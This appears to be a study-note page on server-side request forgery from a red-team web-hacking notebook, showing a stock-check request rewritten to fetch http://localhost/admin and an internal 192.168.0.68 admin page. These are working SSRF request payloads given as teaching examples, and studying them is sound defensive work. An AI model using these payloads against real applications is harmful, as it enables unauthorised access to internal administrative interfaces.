RedTeam
3.Web-Hacking
4.Injection
SSRF
Notes
2.common Attacks

Common Attacks

Attacks Against the Server Itself

  • Attacker induces the application to make an HTTP request back to the server that is hosting the application (via loopback)
  • Involves supplying the URL with a hostname like 127.0.0.1 or localhost
  • Example code -- shopping application that allows user to check stock
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D
6%26storeId%3D1
- Makes request to the URL
- Retrieves the stock status
- Return to the user
  • Modify this for an attack:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-
urlencoded
Content-Length: 118
stockApi=http://localhost/admin
- Server fetches contents of the /admin url and returns to the user
- Authenticates as the machine/server itself

Attacks Against Other Systems

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-
urlencoded
Content-Length: 118
stockApi=http://192.168.0.68/admin